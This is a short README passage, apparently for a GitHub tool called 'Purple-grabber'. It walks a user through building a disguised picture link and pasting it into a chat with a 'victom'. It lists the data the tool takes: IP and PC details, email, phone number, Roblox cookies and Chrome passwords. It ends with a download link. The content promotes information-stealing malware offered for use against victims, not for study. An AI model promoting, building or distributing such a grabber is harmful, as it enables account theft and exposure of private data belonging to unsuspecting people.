Juls089/Purple-grabber/README.md

 4. Choose the name, that the picture should be named
 5. Hit the **Build** Button and you will get the link of the picture directly in your clip board.
 6. Go to the chat with the victom and press **CMD + V** or paste the link in

+Also see
+ip and pc information
+email
+phonenumber
+roblox-cookie
+crome password list (has some issues)

+-More comming soon

 ### [DOWNLOAD] https://github.com/Juls089/Purple-logger/archive/refs/heads/main.zip